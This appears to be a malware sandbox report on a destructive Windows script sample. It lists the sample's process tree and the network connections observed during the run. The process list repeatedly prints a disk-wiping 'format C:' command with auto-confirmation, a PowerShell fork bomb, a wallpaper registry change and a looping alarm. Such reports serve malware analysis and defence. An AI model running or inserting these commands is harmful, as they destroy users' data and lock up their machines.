C:\Windows\system32\format.com
format C: /fs:NULL /p:3 /q
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
C:\Windows\system32\format.com
format C: /fs:NULL /p:3 /q
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
C:\Windows\system32\format.com
format C: /fs:NULL /p:3 /q
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
C:\Windows\system32\format.com
format C: /fs:NULL /p:3 /q
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
C:\Windows\system32\format.com
format C: /fs:NULL /p:3 /q
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
C:\Windows\system32\format.com
format C: /fs:NULL /p:3 /q
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
C:\Windows\system32\format.com
format C: /fs:NULL /p:3 /q
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
C:\Windows\system32\format.com
format C: /fs:NULL /p:3 /q
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
C:\Windows\system32\format.com
format C: /fs:NULL /p:3 /q
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
C:\Windows\system32\format.com
format C: /fs:NULL /p:3 /q
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
C:\Windows\system32\format.com
format C: /fs:NULL /p:3 /q
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
C:\Windows\system32\format.com
format C: /fs:NULL /p:3 /q
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
C:\Windows\system32\format.com
format C: /fs:NULL /p:3 /q
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
C:\Windows\system32\format.com
format C: /fs:NULL /p:3 /q
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
C:\Windows\system32\format.com
format C: /fs:NULL /p:3 /q
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
C:\Windows\system32\format.com
format C: /fs:NULL /p:3 /q
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
C:\Windows\system32\format.com
format C: /fs:NULL /p:3 /q
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
C:\Windows\system32\format.com
format C: /fs:NULL /p:3 /q
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
C:\Windows\system32\format.com
format C: /fs:NULL /p:3 /q
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
C:\Windows\system32\format.com
format C: /fs:NULL /p:3 /q
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
C:\Windows\system32\format.com
format C: /fs:NULL /p:3 /q
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
C:\Windows\system32\format.com
format C: /fs:NULL /p:3 /q
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
C:\Windows\system32\format.com
format C: /fs:NULL /p:3 /q
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
C:\Windows\system32\format.com
format C: /fs:NULL /p:3 /q
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
C:\Windows\system32\format.com
format C: /fs:NULL /p:3 /q
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
C:\Windows\system32\format.com
format C: /fs:NULL /p:3 /q
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
C:\Windows\system32\format.com
format C: /fs:NULL /p:3 /q
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
C:\Windows\system32\format.com
format C: /fs:NULL /p:3 /q
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
C:\Windows\system32\format.com
format C: /fs:NULL /p:3 /q
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
C:\Windows\system32\format.com
format C: /fs:NULL /p:3 /q
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
C:\Windows\system32\format.com
format C: /fs:NULL /p:3 /q
C:\Windows\system32\wscript.exe
wscript.exe "C:\Users\Admin\Desktop\MARCUS V6.6.6 .bat?.WSF//Job:Nyan"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c "(New-Object Media.SoundPlayer 'C:\Windows\Media\alarm.mp3').PlayLooping()"
C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\magnus\matrix.bmp" /f
C:\Windows\system32\wscript.exe
wscript.exe "C:\Users\Admin\Desktop\MARCUS V6.6.6 .bat?.WSF//Job:Nyan"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c "(New-Object Media.SoundPlayer 'C:\Windows\Media\alarm.mp3').PlayLooping()"
C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\magnus\matrix.bmp" /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c "while(1) { Start-Job -ScriptBlock { while(1) { [Math]::Pow([Math]::PI, [Math]::E) } } }"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x264,0x268,0x26c,0x260,0x274,0x7ffdbf0cf208,0x7ffdbf0cf214,0x7ffdbf0cf220
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1812,i,6946532384449729555,16583352416098345170,262144 --variations-seed-version --mojo-platform-channel-handle=2216 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2184,i,6946532384449729555,16583352416098345170,262144 --variations-seed-version --mojo-platform-channel-handle=2156 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2520,i,6946532384449729555,16583352416098345170,262144 --variations-seed-version --mojo-platform-channel-handle=2840 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4272,i,6946532384449729555,16583352416098345170,262144 --variations-seed-version --mojo-platform-channel-handle=4192 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4532,i,6946532384449729555,16583352416098345170,262144 --variations-seed-version --mojo-platform-channel-handle=4556 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4532,i,6946532384449729555,16583352416098345170,262144 --variations-seed-version --mojo-platform-channel-handle=4556 /prefetch:8
C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa392d855 /state1:0x41c64e6d
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo [ 100% "
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | www.mediafire.com | udp |
| US | 8.8.8.8:53 | www.mediafire.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 150.171.28.11:80 | edge.microsoft.com | tcp |
| US | 104.17.150.117:443 | www.mediafire.com | udp |
| US | 150.171.27.11:443 | edge.microsoft.com | tcp |
| US | 104.17.150.117:443 | www.mediafire.com | tcp |
| US | 8.8.8.8:53 | api.edgeoffer.microsoft.com | udp |
| US | 8.8.8.8:53 | api.edgeoffer.microsoft.com | udp |
| US | 8.8.8.8:53 | copilot.microsoft.com | udp |
| US | 8.8.8.8:53 | copilot.microsoft.com | udp |
| US | 8.8.8.8:53 | static.mediafire.com | udp |
| US | 8.8.8.8:53 | static.mediafire.com | udp |
| US | 8.8.8.8:53 | the.gatekeeperconsent.com | udp |
| US | 8.8.8.8:53 | the.gatekeeperconsent.com | udp |
| US | 172.67.199.186:443 | the.gatekeeperconsent.com | udp |
| US | 104.17.150.117:443 | static.mediafire.com | udp |
| US | 8.8.8.8:53 | privacy.gatekeeperconsent.com | udp |
| US | 8.8.8.8:53 | privacy.gatekeeperconsent.com | udp |
| US | 104.17.150.117:443 | static.mediafire.com | udp |
| US | 172.67.199.186:443 | privacy.gatekeeperconsent.com | udp |
| US | 8.8.8.8:53 | btloader.com | udp |
| US | 8.8.8.8:53 | btloader.com | udp |
| US | 8.8.8.8:53 | www.ezojs.com | udp |
| US | 8.8.8.8:53 | www.ezojs.com | udp |
| US | 8.8.8.8:53 | translate.google.com | udp |
| US | 8.8.8.8:53 | translate.google.com | udp |
| US | 8.8.8.8:53 | static.cloudflareinsights.com | udp |
| US | 8.8.8.8:53 | static.cloudflareinsights.com | udp |
| US | 8.8.8.8:53 | cdn.amplitude.com | udp |
| US | 8.8.8.8:53 | cdn.amplitude.com | udp |
| US | 104.21.63.106:443 | www.ezojs.com | udp |
| DE | 18.245.86.4:443 | cdn.amplitude.com | tcp |
| US | 104.16.79.73:443 | static.cloudflareinsights.com | tcp |
| US | 104.22.75.216:443 | btloader.com | tcp |
| DE | 142.250.186.78:443 | translate.google.com | tcp |
| US | 172.67.199.186:443 | privacy.gatekeeperconsent.com | udp |
| US | 172.67.199.186:443 | privacy.gatekeeperconsent.com | udp |
| US | 172.67.199.186:443 | privacy.gatekeeperconsent.com | tcp |
| US | 8.8.8.8:53 | cdn.econventa.com | udp |
| US | 8.8.8.8:53 | cdn.econventa.com | udp |
| US | 8.8.8.8:53 | g.ezoic.net | udp |
| US | 8.8.8.8:53 | g.ezoic.net | udp |
| US | 8.8.8.8:53 | api.edgeoffer.microsoft.com | udp |
| US | 8.8.8.8:53 | api.edgeoffer.microsoft.com | udp |
| US | 8.8.8.8:53 | copilot.microsoft.com | udp |
| US | 8.8.8.8:53 | copilot.microsoft.com | udp |
| FR | 13.37.187.223:443 | g.ezoic.net | tcp |
| US | 13.107.246.64:443 | api.edgeoffer.microsoft.com | tcp |
| GB | 88.221.135.9:443 | copilot.microsoft.com | tcp |
| US | 8.8.8.8:53 | go.ezodn.com | udp |
| US | 8.8.8.8:53 | go.ezodn.com | udp |
| US | 8.8.8.8:53 | securepubads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | securepubads.g.doubleclick.net | udp |
| US | 172.67.199.186:443 | privacy.gatekeeperconsent.com | udp |
| US | 172.67.142.121:443 | go.ezodn.com | udp |
| DE | 216.58.206.34:443 | securepubads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | ag.dns-finder.com | udp |
| US | 8.8.8.8:53 | ag.dns-finder.com | udp |
| US | 8.8.8.8:53 | ad-delivery.net | udp |
| US | 8.8.8.8:53 | ad-delivery.net | udp |
| US | 150.171.27.11:443 | edge.microsoft.com | tcp |
| US | 172.67.11.120:443 | ad-delivery.net | tcp |
| US | 172.67.11.120:443 | ad-delivery.net | tcp |
| US | 8.8.8.8:53 | api.amplitude.com | udp |
| US | 8.8.8.8:53 | api.amplitude.com | udp |
| US | 52.12.29.228:443 | api.amplitude.com | tcp |
| US | 8.8.8.8:53 | translate.googleapis.com | udp |
| US | 8.8.8.8:53 | translate.googleapis.com | udp |
| DE | 216.58.206.34:443 | securepubads.g.doubleclick.net | udp |
| FR | 13.37.187.223:443 | g.ezoic.net | tcp |
| US | 52.12.29.228:443 | api.amplitude.com | tcp |
| FR | 13.37.187.223:443 | g.ezoic.net | tcp |
| US | 172.67.199.186:443 | privacy.gatekeeperconsent.com | udp |
| US | 8.8.8.8:53 | fundingchoicesmessages.google.com | udp |
| US | 8.8.8.8:53 | fundingchoicesmessages.google.com | udp |
| US | 8.8.8.8:53 | btlr.sharethrough.com | udp |
| US | 8.8.8.8:53 | btlr.sharethrough.com | udp |
| US | 8.8.8.8:53 | api.btloader.com | udp |
| US | 8.8.8.8:53 | api.btloader.com | udp |
| US | 8.8.8.8:53 | hbopenbid.pubmatic.com | udp |
| US | 8.8.8.8:53 | hbopenbid.pubmatic.com | udp |
| DE | 142.250.186.78:443 | fundingchoicesmessages.google.com | tcp |
| DE | 3.78.93.150:443 | btlr.sharethrough.com | tcp |
| DE | 3.78.93.150:443 | btlr.sharethrough.com | tcp |
| DE | 3.78.93.150:443 | btlr.sharethrough.com | tcp |
| DE | 3.78.93.150:443 | btlr.sharethrough.com | tcp |
| DE | 3.78.93.150:443 | btlr.sharethrough.com | tcp |
| US | 130.211.23.194:443 | api.btloader.com | tcp |
| US | 130.211.23.194:443 | api.btloader.com | tcp |
| NL | 185.64.189.112:443 | hbopenbid.pubmatic.com | tcp |
| US | 104.17.150.117:443 | static.mediafire.com | udp |
| US | 8.8.8.8:53 | cdn.econventa.com | udp |
| US | 8.8.8.8:53 | cdn.econventa.com | udp |
| FR | 13.37.187.223:443 | g.ezoic.net | tcp |
| DE | 142.250.186.78:443 | fundingchoicesmessages.google.com | udp |
| US | 8.8.8.8:53 | translate.googleapis.com | udp |
| US | 8.8.8.8:53 | translate.googleapis.com | udp |
| DE | 142.250.181.234:443 | translate.googleapis.com | tcp |
| US | 8.8.8.8:53 | translate-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | translate-pa.googleapis.com | udp |
| DE | 142.250.186.106:443 | translate-pa.googleapis.com | tcp |
| US | 150.171.27.11:443 | edge.microsoft.com | tcp |
| US | 8.8.8.8:53 | cdn.econventa.com | udp |
| US | 104.26.9.66:443 | cdn.econventa.com | tcp |
| US | 130.211.23.194:443 | api.btloader.com | udp |
| US | 8.8.8.8:53 | econventa.com | udp |
| US | 8.8.8.8:53 | econventa.com | udp |
| US | 172.67.69.81:443 | econventa.com | udp |
| US | 8.8.8.8:53 | www.mediafiredls.com | udp |
| US | 8.8.8.8:53 | www.mediafiredls.com | udp |
| US | 8.8.8.8:53 | tags.crwdcntrl.net | udp |
| US | 8.8.8.8:53 | tags.crwdcntrl.net | udp |
| US | 8.8.8.8:53 | ad.crwdcntrl.net | udp |
| US | 8.8.8.8:53 | ad.crwdcntrl.net | udp |
| US | 8.8.8.8:53 | bcp.crwdcntrl.net | udp |
| US | 8.8.8.8:53 | bcp.crwdcntrl.net | udp |
| IE | 52.16.255.172:443 | bcp.crwdcntrl.net | tcp |
| US | 104.26.2.173:443 | www.mediafiredls.com | tcp |
| DE | 65.9.66.122:443 | tags.crwdcntrl.net | tcp |
| IE | 54.194.27.185:443 | bcp.crwdcntrl.net | tcp |
| GB | 95.101.143.35:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | ads.pubmatic.com | udp |
| US | 8.8.8.8:53 | ads.pubmatic.com | udp |
| GB | 23.192.17.43:443 | ads.pubmatic.com | tcp |
| GB | 23.192.17.43:443 | ads.pubmatic.com | tcp |
| US | 150.171.27.11:443 | edge.microsoft.com | tcp |
| US | 8.8.8.8:53 | update.googleapis.com | udp |
| US | 8.8.8.8:53 | update.googleapis.com | udp |
| DE | 142.250.186.99:443 | update.googleapis.com | tcp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edgeassetservice.azureedge.net | udp |
| US | 8.8.8.8:53 | edgeassetservice.azureedge.net | udp |
| US | 13.107.246.64:443 | edgeassetservice.azureedge.net | tcp |
| US | 13.107.246.64:443 | edgeassetservice.azureedge.net | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 150.171.27.11:443 | edge.microsoft.com | tcp |
| US | 8.8.8.8:53 | clients2.googleusercontent.com | udp |
| US | 8.8.8.8:53 | clients2.googleusercontent.com | udp |
| DE | 142.250.186.129:443 | clients2.googleusercontent.com | udp |
| US | 172.67.142.121:443 | go.ezodn.com | udp |
| US | 8.8.8.8:53 | secure.quantserve.com | udp |
